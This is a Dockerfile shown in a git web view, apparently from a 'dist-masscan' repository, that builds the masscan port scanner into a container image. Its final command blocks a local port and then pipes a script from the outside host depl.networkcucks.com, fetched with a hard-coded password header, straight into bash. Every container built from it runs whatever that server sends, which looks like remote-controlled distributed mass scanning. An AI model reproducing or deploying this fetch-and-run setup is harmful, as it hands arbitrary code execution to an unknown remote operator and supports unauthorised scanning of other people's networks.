]> Git Repo - dist-masscan.git/blob - Dockerfile
bug in their code amazing
[dist-masscan.git] / Dockerfile
1 FROM ubuntu:latest as build
2 RUN apt update && apt install -y git build-essential
3 RUN git clone https://github.com/Mr-Bossman/masscan.git
4 WORKDIR masscan
5 RUN make
6 RUN make install
7 FROM ubuntu:latest as final
8 COPY --from=build /usr/bin/masscan /usr/bin/masscan
9 RUN apt update && apt install -y curl iptables libpcap0.8 && apt clean
10 RUN curl https://raw.githubusercontent.com/Mr-Bossman/masscan/master/data/exclude.conf > exclude.conf
11 CMD iptables-nft -A INPUT -p tcp --dport 61000 -j DROP && curl -sNH "pass:carl" http://depl.networkcucks.com:8080 | bash
This page took 0.028729 seconds and 4 git commands to generate.